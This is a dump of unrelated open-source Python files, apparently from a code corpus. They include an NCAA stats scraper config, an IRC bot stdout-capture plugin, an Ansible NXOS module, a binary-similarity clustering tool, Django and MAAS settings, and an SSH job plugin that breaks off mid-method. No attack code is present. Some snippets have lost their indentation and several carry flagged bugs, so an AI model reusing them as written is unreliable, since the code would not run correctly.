ind_team_stats = 1 # Get individual team statistics (a line per team, such that each game will have two lines (one for away team, one for home team)) (0 = no, 1 = yes)
# Where do you want to save the data?
team_mappingfile = "mappings/team_mappings.tsv" # Data file for team mappings
player_mappingfile = "mappings/player_mappings.tsv" # Data file for player mappings
schedule_mappingfile = "mappings/schedule_mappings.tsv" # Data file for schedule mappings
summary_player_data = "data/summary_player_data.tsv" # Data file for individual player summary statistics
summary_team_data = "data/summary_team_data.tsv" # Data file for team summary statistics
game_data = "data/game_data.tsv" # Data file for each game
player_data = "data/player_data.tsv" # Data file for each player
team_data = "data/team_data.tsv" # Data file for each team
#### The variables below could be set, but probably don't need any modification #####
debugmode = 1 # Output program steps (0 = off, 1 = on)
params = { } # Any POST parameters that need to be sent (default)
http_header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0",
    "Accept": "text/plain, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "DNT": "1",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": "http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
} # Variables from the HTTP header (default)
start_url = 'http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&academic_year=' + str(academic_year) + "&division=1" # URL to start from (Change this for different years). You can get this URL from http://stats.ncaa.org/team/inst_team_list?sport_code=MBB&division=1. This URL is for the 2011-2012 season.
domain_base = 'http://stats.ncaa.org' # Base domain
kg-bot/SupyBot | refs/heads/master | plugins/StdoutCapture/plugin.py | 1 | ###
# Copyright (c) 2013, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import sys
import json
import logging
import weakref
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('StdoutCapture')
except:
# Placeholder that allows to run the plugin on a bot
# without the i18n module
_ = lambda x:x
class StdoutBuffer:
    """File-like wrapper that tees writes into a shared ring buffer.

    The buffer is a class attribute so that the stdout and stderr wrappers
    share a single, interleaved history of the last 100 writes.
    """
    _buffer = utils.structures.RingBuffer(100)

    def __init__(self, stdout):
        # The real underlying stream (sys.stdout or sys.stderr).
        self._real = stdout

    def write(self, data):
        self._real.write(data)
        if data == '\n' and self._buffer:
            # Attach a lone newline to the preceding chunk so each buffered
            # entry ends up holding a full line.  Guarding on a non-empty
            # buffer fixes an IndexError when the very first write is '\n'.
            self._buffer[-1] += '\n'
        else:
            self._buffer.append(data)

    def flush(self):
        # NOTE(review): deliberately not delegated to the real stream in
        # the original code; kept as a no-op to preserve behaviour.
        pass
class StdoutCapture(callbacks.Plugin):
    """Add the help for "@plugin help StdoutCapture" here
    This should describe *how* to use this plugin."""
    def __init__(self, irc):
        super(StdoutCapture, self).__init__(irc)
        self.StdoutBuffer = StdoutBuffer
        # Wrap both standard streams so every write is recorded in the
        # shared ring buffer while still reaching the original stream.
        sys.stdout = self.StdoutBuffer(sys.stdout)
        sys.stderr = self.StdoutBuffer(sys.stderr)
        # I'm being a bit evil here.
        # Re-point any logging handlers that still hold a reference to the
        # old (real) streams at the wrapped ones.
        for logger in logging._handlerList:
            if isinstance(logger, weakref.ref):
                logger = logger()
            if not hasattr(logger, 'stream'):
                continue
            if logger.stream is sys.stdout._real:
                # NOTE(review): both branches redirect to sys.stderr; this
                # one was probably meant to be sys.stdout -- confirm intent.
                logger.stream = sys.stderr
            elif logger.stream is sys.stderr._real:
                logger.stream = sys.stderr
    def die(self):
        # Restore the real streams and handler references on plugin unload.
        super(self.__class__, self).die()
        # NOTE(review): the second assert repeats sys.stdout; it was
        # probably meant to check sys.stderr instead.
        assert isinstance(sys.stdout, self.StdoutBuffer)
        assert isinstance(sys.stdout, self.StdoutBuffer)
        for logger in logging._handlerList:
            logger = logger()
            if not hasattr(logger, 'stream'):
                continue
            if logger.stream in (sys.stdout, sys.stderr):
                logger.stream = logger.stream._real
        sys.stdout = sys.stdout._real
        sys.stderr = sys.stderr._real
    def history(self, irc, msg, args, number):
        """<number>
        Return the last lines displayed in the console."""
        irc.replies(StdoutBuffer._buffer[-number:])
    history = wrap(history, ['positiveInt', 'owner'])
    def pastebin(self, irc, msg, args, number, url=None):
        """<number> [<pastebin url>]
        Paste the last lines displayed in the console on a pastebin and
        returns the URL.
        The pastebin has to support the LodgeIt API."""
        base = url or self.registryValue('pastebin', msg.args[0])
        # Normalise a trailing slash before building the API URL.
        if base.endswith('/'):
            base = base[0:-1]
        fd = utils.web.getUrlFd(base+'/json/?method=pastes.newPaste',
                                data=json.dumps({
                                    'language': 'text',
                                    'code': ''.join(StdoutBuffer._buffer[-number:]),
                                }),
                                headers={'Content-Type': 'application/json'})
        irc.reply('%s/show/%s' % (base, json.load(fd)['data']))
    pastebin = wrap(pastebin, ['owner', 'positiveInt', optional('text')])
Class = StdoutCapture
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: |
partofthething/home-assistant | refs/heads/dev | homeassistant/components/flunearyou/const.py | 9 | """Define flunearyou constants."""
import logging
# Integration domain name.
DOMAIN = "flunearyou"
# Package-level logger shared by the integration.
LOGGER = logging.getLogger(__package__)
# Key under which the update coordinator is stored.
DATA_COORDINATOR = "coordinator"
# Report categories distinguishing CDC data from user-submitted data.
CATEGORY_CDC_REPORT = "cdc_report"
CATEGORY_USER_REPORT = "user_report"
|
shawnsi/ansible-modules-core | refs/heads/devel | network/nxos/nxos_template.py | 26 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: nxos_template
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage Cisco NXOS device configurations
description:
- Manages network device configurations over SSH or NXAPI. This module
allows implementors to work with the device running-config. It
provides a way to push a set of commands onto a network device
by evaluting the current running-config and only pushing configuration
commands that are not already configured. The config source can
be a set of commands or a template.
extends_documentation_fragment: nxos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
file in role or playbook root folder in templates directory.
required: false
default: null
force:
description:
- The force argument instructs the module to not consider the
current devices running-config. When set to true, this will
cause the module to push the contents of I(src) into the device
without first checking if already configured.
required: false
default: false
choices: [ "true", "false" ]
include_defaults:
description:
- The module, by default, will collect the current device
running-config to use as a base for comparision to the commands
in I(src). Setting this value to true will cause the module
to issue the command `show running-config all` to include all
device settings.
required: false
default: false
choices: [ "true", "false" ]
backup:
description:
- When this argument is configured true, the module will backup
the running-config from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: [ "true", "false" ]
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current running-config to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current running-config for
every task in a playbook. The I(config) argument allows the
implementer to pass in the configuruation to use as the base
config for comparision.
required: false
default: null
"""
EXAMPLES = """
- name: push a configuration onto the device
nxos_template:
src: config.j2
- name: forceable push a configuration onto the device
nxos_template:
src: config.j2
force: yes
- name: provide the base configuration for comparision
nxos_template:
src: candidate_config.txt
config: current_config.txt
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: always
type: list
sample: ['...', '...']
responses:
description: The set of responses from issuing the commands on the device
retured: when not check_mode
type: list
sample: ['...', '...']
"""
def get_config(module):
    """Return the base configuration to diff the candidate against.

    Prefers the explicit ``config`` module parameter; otherwise, unless
    ``force`` is set, falls back to the config cached on the module object.
    """
    contents = module.params['config'] or dict()
    if not contents and not module.params['force']:
        contents = module.config
    return contents
def main():
    """Module entry point: diff the candidate config against the device
    config and push only the commands that are not already present.
    """
    argument_spec = dict(
        src=dict(),
        force=dict(default=False, type='bool'),
        include_defaults=dict(default=False, type='bool'),
        backup=dict(default=False, type='bool'),
        config=dict()
    )
    # 'config' replaces both the backup and the live comparison, so it
    # cannot be combined with either option.
    mutually_exclusive = [('config', 'backup'), ('config', 'force')]
    module = get_module(argument_spec=argument_spec,
                        mutually_exclusive=mutually_exclusive,
                        supports_check_mode=True)
    result = dict(changed=False)
    candidate = NetworkConfig(contents=module.params['src'], indent=2)
    contents = get_config(module)
    if contents:
        config = NetworkConfig(contents=contents, indent=2)
        result['_backup'] = contents
    if not module.params['force']:
        # Push only the lines missing from the current config.
        # NOTE(review): if get_config() returned empty here, `config` is
        # unbound and this raises NameError -- confirm intended behaviour.
        commands = candidate.difference(config)
    else:
        # force: push the full candidate config unconditionally.
        commands = str(candidate).split('\n')
    if commands:
        if not module.check_mode:
            commands = [str(c).strip() for c in commands]
            response = module.configure(commands)
            result['responses'] = response
        result['changed'] = True
        result['updates'] = commands
    module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.nxos import *
if __name__ == '__main__':
main()
|
be-cloud-be/horizon-addons | refs/heads/9.0 | partner-contact/partner_contact_nutrition_exclusion/models/res_partner.py | 1 | # -*- coding: utf-8 -*-
# Copyright 2016 Ursa Information Systems <http://ursainfosystems.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import fields, models
class ResPartner(models.Model):
    # Extends partners with nutrition exclusions: products the partner must
    # not be offered (e.g. allergies or dietary restrictions).
    _inherit = 'res.partner'
    # NOTE(review): standard Odoo product types are 'product'/'consu'/'service';
    # the 'stockable' value in this domain looks unusual -- confirm it matches
    # the product.product 'type' values actually used in this database.
    nutrition_exclusion_ids = fields.Many2many(comodel_name='product.product',
                                               string='Exclusions',
                                               domain="[('type', '=',"
                                                      " 'stockable')]")
|
mensler/ansible | refs/heads/devel | test/integration/targets/module_utils/module_utils/spam4/__init__.py | 12133432 | |
ManiacalLabs/BiblioPixel | refs/heads/master | test/bibliopixel/util/image/__init__.py | 12133432 | |
meletakis/collato | refs/heads/master | lib/python2.7/site-packages/django/conf/locale/en_GB/__init__.py | 12133432 | |
jit/pyew | refs/heads/master | gcluster.py | 14 | #!/usr/bin/env python
"""
A program's clusterization tool based on Pyew
Copyright (C) 2010, Joxean Koret
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os, sys
from hashlib import sha256
from pyew_core import CPyew
def primes(n):
    """Return the list of all primes <= n (odds-only sieve of Eratosthenes).

    Fix: the original relied on Python 2 semantics -- integer '/' division
    and range() returning a mutable list.  Explicit floor division (//) and
    list(range(...)) keep the result identical under Python 2 while making
    the function work under Python 3 as well.
    """
    if n == 2:
        return [2]
    elif n < 2:
        return []
    # Sieve over the odd numbers 3, 5, 7, ..., n; a slot is zeroed once a
    # prime divides it.
    s = list(range(3, n + 1, 2))
    mroot = n ** 0.5
    half = (n + 1) // 2 - 1
    i = 0
    m = 3
    while m <= mroot:
        if s[i]:
            # Index of m*m inside the odds-only sieve.
            j = (m * m - 3) // 2
            s[j] = 0
            while j < half:
                s[j] = 0
                j += m
        i = i + 1
        m = 2 * i + 3
    return [2] + [x for x in s if x]
class CAdjacencyList(object):
    """Compares two analysed samples by their per-function statistics.

    Python 2 code: relies on print statements and on dict.values()
    returning a list.
    """
    def __init__(self, data):
        # data: list of {sha256: CPyew} dicts, one per analysed sample.
        self.data = data
        self.adjacency_lists = {}  # currently unused cache
    def createAdjacencyList(self, pyew):
        # One (nodes, edges, cyclomatic complexity) tuple per function.
        return pyew.function_stats.values()
    def getSimilarity(self, s1, s2):
        # Percentage difference between two stat sets, normalised so that
        # identical sets yield 0.
        m = max(len(s1), len(s2))
        diff1 = len(s1.difference(s2))
        diff2 = len(s2.difference(s1))
        diff = (diff1 + diff2)*100./m
        simil1 = len(s1.intersection(s2))
        simil = simil1*100. / m
        metric = simil + diff
        diff = diff * 100. / metric
        return diff
    def compareTwoSets(self, set1, set2):
        # NOTE(review): the prints below look like leftover debug output,
        # and the formula used here differs from getSimilarity() above.
        pyew1 = set1.values()[0]
        pyew2 = set2.values()[0]
        al1 = self.createAdjacencyList(pyew1)
        al2 = self.createAdjacencyList(pyew2)
        if al1 == al2:
            return 0
        else:
            s1 = set(al1)
            s2 = set(al2)
            print s1, s2
            diff = len(s1.difference(s2)) + len(s2.difference(s1))
            print diff
            total = max(len(s1), len(s2))
            print total, len(s1), len(s2)
            simil = diff * 100. / total
            return simil
    def cluster(self):
        # Only the two-sample case is implemented; returns None otherwise.
        if len(self.data) == 2:
            set1 = self.data[0]
            set2 = self.data[1]
            return self.compareTwoSets(set1, set2)
class CPrimesCluster(object):
    """Compares samples by mapping each distinct cyclomatic complexity to a
    prime and multiplying them: equal products mean structurally equal
    programs.  Python 2 code (print statements, list-returning values())."""
    def __init__(self, data):
        # primes[cc] is the cc-th prime; the table covers any realistic
        # cyclomatic complexity value.
        self.primes = primes(1024*1024)
        self.data = data
    def generateHash(self, pyew):
        # NOTE(review): val is a float product of primes -- precision may be
        # lost for very large programs; equal values are still a strong
        # (not perfect) equality signal.
        val = 1.
        dones = []
        primes_done = []
        for f in pyew.functions:
            nodes, edges, cc = pyew.function_stats[f]
            if cc > 1 and (nodes, edges, cc) not in dones:
                p = self.primes[cc]
                if p not in primes_done:
                    val *= p
                    primes_done.append(p)
                dones.append((nodes, edges, cc))
        return val, dones
    def compareManySets(self, sets):
        # Pairwise comparison of all samples, emitted as CSV on stdout.
        # NOTE(review): the local names 'primes' and 'hash' shadow the
        # module-level primes() function and the builtin.
        files = {}
        primes = {}
        values = {}
        print "File1;File2;Difference"
        for s in sets:
            pyew = s.values()[0]
            val, prime = self.generateHash(pyew)
            hash = sha256(pyew.getBuffer()).hexdigest()
            primes[hash] = prime
            values[hash] = val
            files[hash] = pyew.filename
            del pyew
        dones = []
        for h1 in values:
            for h2 in values:
                if h1 == h2 or (h1, h2) in dones or (h2, h1) in dones:
                    continue
                if values[h1] == values[h2]:
                    print "%s;%s;0" % (files[h1], files[h2])
                    dones.append((h1, h2))
                    dones.append((h2, h1))
                else:
                    dones.append((h1, h2))
                    dones.append((h2, h1))
                    s1 = set(primes[h1])
                    s2 = set(primes[h2])
                    diff = self.getSimilarity(s1, s2)
                    print "%s;%s;%f" % (files[h1], files[h2], diff)
    def getSimilarity(self, s1, s2):
        # Same normalised-percentage formula as CAdjacencyList.getSimilarity.
        m = max(len(s1), len(s2))
        diff1 = len(s1.difference(s2))
        diff2 = len(s2.difference(s1))
        diff = (diff1 + diff2)*100./m
        simil1 = len(s1.intersection(s2))
        simil = simil1*100. / m
        metric = simil + diff
        diff = diff * 100. / metric
        return diff
    def compareTwoSets(self, set1, set2):
        # Equal prime products -> structurally identical (difference 0).
        pyew1 = set1.values()[0]
        val1, primes1 = self.generateHash(pyew1)
        pyew2 = set2.values()[0]
        val2, primes2 = self.generateHash(pyew2)
        s1 = set(primes1)
        s2 = set(primes2)
        if val1 == val2:
            return 0
        else:
            diff = self.getSimilarity(s1, s2)
            return diff
    def cluster(self):
        # Two samples -> numeric difference; more -> CSV dump (returns None).
        if len(self.data) == 2:
            set1 = self.data[0]
            set2 = self.data[1]
            return self.compareTwoSets(set1, set2)
        else:
            return self.compareManySets(self.data)
class CExpertCluster(object):
    """Scores the difference between two samples with a hand-tuned ("expert")
    weighting of cyclomatic-complexity statistics and function counts."""
    def __init__(self, data):
        # data: list of {sha256: CPyew} dicts; cluster() expects exactly two.
        self.data = data
    def compareTwoSets(self, set1, set2):
        # Get the ciclomatic complexity statistical data of the 2 samples.
        # next(iter(...)) instead of .values()[0]: identical on Python 2 and
        # also works on Python 3, where dict.values() is a non-indexable view.
        pyew1 = next(iter(set1.values()))
        pyew2 = next(iter(set2.values()))
        ccs1 = pyew1.program_stats["ccs"]
        ccs2 = pyew2.program_stats["ccs"]
        avg_cc_distance = abs(ccs1["avg"] - ccs2["avg"])
        max_cc_distance = abs(ccs1["max"] - ccs2["max"])
        min_cc_distance = abs(ccs1["min"] - ccs2["min"])
        total_functions = abs(len(pyew1.functions) - len(pyew2.functions))
        # Weighted blend: average complexity dominates, then the maximum;
        # the minimum and the function-count delta act as tiebreakers.
        difference = avg_cc_distance*0.5 + \
                     max_cc_distance*0.3 + \
                     min_cc_distance*0.1 + \
                     total_functions*0.1
        return difference
    def cluster(self):
        """Return the expert-system difference between the two samples."""
        set1 = self.data[0]
        set2 = self.data[1]
        return self.compareTwoSets(set1, set2)
class CGraphCluster(object):
    """Driver object: loads samples with Pyew and runs the three comparison
    strategies (expert weights, prime products, adjacency lists).
    Python 2 code (print statements)."""
    def __init__(self):
        self.clear()
        self.deep = False     # enable Pyew deep code analysis
        self.timeout = 0      # analysis timeout (0 = unlimited)
    def addFile(self, filename):
        # Queue a file for processFiles().
        self.files.append(filename)
    def clear(self):
        self.files = []
        self.results = []
        self.data = []        # list of {sha256: CPyew} per accepted sample
    def processFile(self, filename):
        # Analyse one file; only PE/ELF binaries are kept.
        sys.stderr.write("[+] Analyzing file %s\n" % filename)
        sys.stderr.flush()
        pyew = CPyew(batch=True)
        pyew.deepcodeanalysis = self.deep
        pyew.analysis_timeout = 0
        pyew.loadFile(filename)
        if pyew.format in ["PE", "ELF"]:
            hash = sha256(pyew.getBuffer()).hexdigest()
            self.data.append({hash:pyew})
        else:
            sys.stderr.writelines("Not a PE/ELF file")
            sys.stderr.flush()
    def comparePrimes(self):
        # Prime-product comparison; prints a human-readable verdict.
        cluster = CPrimesCluster(self.data)
        val = cluster.cluster()
        if val == 0:
            print "Primes system: Programs are 100% equals"
        else:
            print "Primes system: Programs differs in", val, "% percent"
    def compareAdjacencyLists(self):
        # Per-function statistics comparison.
        cluster = CAdjacencyList(self.data)
        val = cluster.cluster()
        if val == 0:
            print "ALists system: Programs are 100% equals"
        else:
            print "ALists System: Programs differs in %f%%" % val
    def compareExpert(self):
        # Weighted expert comparison; the only strategy returning its score.
        cluster = CExpertCluster(self.data)
        val = cluster.cluster()
        if val == 0:
            print "Expert system: Programs are 100% equals"
        else:
            print "Expert system: Programs differs in %f%s" % (round(val, 1), "%")
        return val
    def processFiles(self):
        # NOTE(review): bare except -- any analysis failure is reduced to a
        # one-line stderr message and the sample is silently skipped.
        for f in self.files:
            try:
                self.processFile(f)
            except:
                sys.stderr.write("Error: %s\n" % str(sys.exc_info()[1]))
                sys.stderr.flush()
def main(prog1, prog2):
    """Analyse two binaries and print their similarity under each of the
    three comparison strategies."""
    clusterer = CGraphCluster()
    for path in (prog1, prog2):
        clusterer.addFile(path)
    clusterer.processFiles()
    clusterer.compareExpert()
    clusterer.comparePrimes()
    clusterer.compareAdjacencyLists()
def compareDirectory(path):
    # Analyse every file under 'path' (or a single file) and dump one
    # colon-separated record per sample, suitable for external clustering.
    # Python 2 code (print statements).
    cluster = CGraphCluster()
    cprimes = CPrimesCluster([])
    alist = CAdjacencyList([])
    if os.path.isdir(path):
        for root, dirs, files in os.walk(path, topdown=False):
            for name in files:
                fname = os.path.join(root, name)
                cluster.addFile(fname)
    else:
        cluster.addFile(path)
    cluster.processFiles()
    print "hash:filename:primes_hash:nodes_total:nodes_max:nodes_avg:nodes_min:edges_total:edges_max:edges_avg:edges_min:ccs_total:ccs_max:ccs_avg:ccs_min:functions:adjacency_list"
    for x in cluster.data:
        hash = x.keys()[0]
        pyew = x.values()[0]
        data = ""
        # Flatten each program_stats sub-dict; decimal points become commas
        # so they don't collide with the ':' field separator.
        for stat in pyew.program_stats:
            data = data + ":".join(map(str, pyew.program_stats[stat].values())).replace(".", ",") + ":"
        # as_integer_ratio()[0] turns the float prime product into an
        # exact integer representation for the report.
        phash, dones = cprimes.generateHash(pyew)
        print "%s:%s:%s:%s%d:%s" % (hash, pyew.f.name, str(phash.as_integer_ratio()[0]), data, len(pyew.functions), str(alist.createAdjacencyList(pyew)))
def usage():
    # Print command-line help for both modes (pairwise diff and CSV dump).
    # Python 2 code (print statements).
    print "Usage:", sys.argv[0], "<prog 1> <prog 2> | <directory>"
    print
    print "When comparing 2 binaries the difference between them is printed out."
    print "When comparing a directory, a csv file with all the relevant data is printed out."
    print
    print "Examples:"
    print "%s /bin/ls /bin/cp" % sys.argv[0]
    print "%s /bin" % sys.argv[0]
    print
# Two file arguments -> pairwise comparison; one argument -> CSV dump for a
# directory (or single file); no arguments -> usage help.
if __name__ == "__main__":
    if len(sys.argv) == 1:
        usage()
    elif len(sys.argv) == 3:
        main(sys.argv[1], sys.argv[2])
    else:
        compareDirectory(sys.argv[1])
|
hoosteeno/kuma | refs/heads/master | kuma/core/tests/test_pagination.py | 26 | from django.test import RequestFactory
from nose.tools import eq_
import pyquery
from ..urlresolvers import reverse
from ..utils import paginate
from ..helpers import paginator
def test_paginated_url():
    """Avoid duplicating the page param when building pagination URLs."""
    url = '{0}?{1}'.format(reverse('search'), 'q=bookmarks&page=2')
    request = RequestFactory().get(url)
    paginated = paginate(request, [{}, {}])
    expected = request.build_absolute_uri(request.path) + '?q=bookmarks'
    eq_(paginated.url, expected)
def test_invalid_page_param():
    """A non-numeric ?page= value must not break URL generation."""
    url = '{0}?{1}'.format(reverse('search'), 'page=a')
    request = RequestFactory().get(url)
    paginated = paginate(request, range(100))
    expected = request.build_absolute_uri(request.path) + '?'
    eq_(paginated.url, expected)
def test_paginator_filter():
    """The paginator template helper emits the right number of <li> items."""
    def rendered_li_count(query_string, total, per_page):
        # Render the pager for the given search URL and count the <li> nodes.
        url = reverse('search')
        if query_string:
            url = '{0}?{1}'.format(url, query_string)
        request = RequestFactory().get(url)
        pager = paginate(request, range(total), per_page=per_page)
        doc = pyquery.PyQuery(paginator(pager))
        return len(doc('li'))
    # Correct number of <li>s on page 1.
    eq_(11, rendered_li_count('', 100, 9))
    # Correct number of <li>s in the middle.
    eq_(13, rendered_li_count('page=10', 200, 10))
|
mmnelemane/neutron | refs/heads/master | neutron/plugins/cisco/service_plugins/cisco_router_plugin.py | 30 | # Copyright 2015 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from networking_cisco.plugins.cisco.service_plugins import cisco_router_plugin
class CiscoRouterPluginRpcCallbacks(
        cisco_router_plugin.CiscoRouterPluginRpcCallbacks):
    # Backwards-compatibility shim: the implementation moved to the
    # networking-cisco package; this keeps the old import path working.
    pass
class CiscoRouterPlugin(cisco_router_plugin.CiscoRouterPlugin):
    # Backwards-compatibility shim: deployments referencing the old
    # neutron plugin path still resolve to the networking-cisco class.
    pass
|
maas/maas | refs/heads/master | src/maasserver/djangosettings/snap.py | 1 | # Copyright 2017 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Django snap settings for maas project."""
import os
from maasserver.djangosettings import import_settings, settings
# Extend base and development settings.
import_settings(settings)
# Override the location of JS libraries.
# Inside the snap these assets ship under $SNAP rather than the distro paths.
JQUERY_LOCATION = os.path.join(
    os.environ["SNAP"], "usr", "share", "javascript", "jquery"
)
ANGULARJS_LOCATION = os.path.join(
    os.environ["SNAP"], "usr", "share", "javascript", "angular.js"
)
# Override path to static root.
STATIC_ROOT = os.path.join(
    os.environ["SNAP"], "usr", "share", "maas", "web", "static"
)
# Override the preseed locations.
# The writable SNAP_DATA directory is searched before the read-only
# defaults bundled in SNAP, so operators can customise preseeds.
PRESEED_TEMPLATE_LOCATIONS = (
    os.path.join(os.environ["SNAP_DATA"], "preseeds"),
    os.path.join(os.environ["SNAP"], "etc", "maas", "preseeds"),
)
|
saga-project/bliss | refs/heads/master | bliss/plugins/ssh/job.py | 1 | # -*- coding: utf-8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
__author__ = "Ashley Zebrowski"
__copyright__ = "Copyright 2012, Ashley Zebrowski"
__license__ = "MIT"
import bliss.saga
from bliss.interface import JobPluginInterface
from bliss.plugins.ssh.process import SSHJobProcess
class SSHJobPlugin(JobPluginInterface):
'''Implements an SSH plugin which makes use of Paramiko'''
########################################
##
class BookKeeper:
'''Keeps track of job and service objects'''
def __init__(self, parent):
self.objects = {}
self.processes = {}
self.parent = parent
def add_service_object(self, service_obj):
self.objects[hex(id(service_obj))] = {'instance' : service_obj, 'jobs' : []}
def del_service_obj(self, service_obj):
try:
self.objects.remove((hex(id(service_obj))))
except Exception:
pass
def add_job_object(self, job_obj, service_obj):
service_id = hex(id(service_obj))
job_id = hex(id(job_obj))
try:
self.objects[service_id]['jobs'].append(job_obj)
self.processes[job_id] = SSHJobProcess(jobdescription=job_obj.get_description(), plugin=self.parent, service_object=service_obj)
except Exception, ex:
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"Can't register job: %s" % (ex))
def del_job_object(self, job_obj):
pass
def get_service_for_job(self, job_obj):
'''Return the service object the job is registered with'''
for key in self.objects.keys():
if job_obj in self.objects[key]['jobs']:
return self.objects[key]['instance']
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"INTERNAL ERROR: Job object %s is not known by this plugin" % (job))
def get_job_for_jobid(self, service_obj, job_id):
'''Return the job object associated with the given job id'''
for job in self.list_jobs_for_service(service_obj):
proc = self.get_process_for_job(job)
if proc.getpid(str(service_obj._url)) == job_id:
return job
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess, "Job ID not known by this plugin.")
def list_jobs_for_service(self, service_obj):
'''List all jobs that are registered with the given service'''
service_id = hex(id(service_obj))
return self.objects[service_id]['jobs']
def get_process_for_job(self, job_obj):
'''Return the local process object for a given job'''
try:
return self.processes[hex(id(job_obj))]
except Exception, ex:
self.parent.log_error_and_raise(bliss.saga.Error.NoSuccess,
"INTERNAL ERROR: Job object %s is not associated with a process" % (job_obj))
##
########################################
_name = 'saga.plugin.job.ssh'
_schemas = ['ssh']
_apis = ['saga.job']
def __init__(self, url):
'''Class constructor'''
JobPluginInterface.__init__(self, name=self._name, schemas=self._schemas)
self.bookkeeper = self.BookKeeper(self)
def __del__ (self):
self.log_debug("In the deconstructor for the SSH job adaptor")
@classmethod
def sanity_check(self):
'''Implements interface from _PluginBase'''
try:
import subprocess
except Exception, ex:
print "module missing -- plugin disabled. (NEEDS LOGGING SUPPORT)"
return False
try:
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import paramiko
except Exception, ex:
self.log_warning("paramiko module missing -- plugin disabled.")
return False
return True
def get_runtime_info(self):
'''Implements interface from _PluginBase'''
## Optional: Can be used for plug-in introspection during runtime.
text = "SSH Plugin standing by"
return text
def register_service_object(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.add_service_object(service_obj)
self.log_info("Registered new service object %s" % (repr(service_obj)))
def unregister_service_object(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.del_service_object(service_obj)
self.log_info("Unregistered service object %s" % (repr(service_obj)))
def unregister_job_object(self, job_obj):
'''Implements interface from _JobPluginBase'''
self.bookkeeper.del_job_object(job_obj)
self.log_info("Unregistered job object %s" % (repr(job_obj)))
def service_create_job(self, service_obj, job_description):
'''Implements interface from _JobPluginBase.
This method is called for saga.Service.create_job().
'''
if job_description.executable is None:
self.log_error_and_raise(bliss.saga.Error.BadParameter,
"No executable defined in job description")
try:
## Create a new job object
